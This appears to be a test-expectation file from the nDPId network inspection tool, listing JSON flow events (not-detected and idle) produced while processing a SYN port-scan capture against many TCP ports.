-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 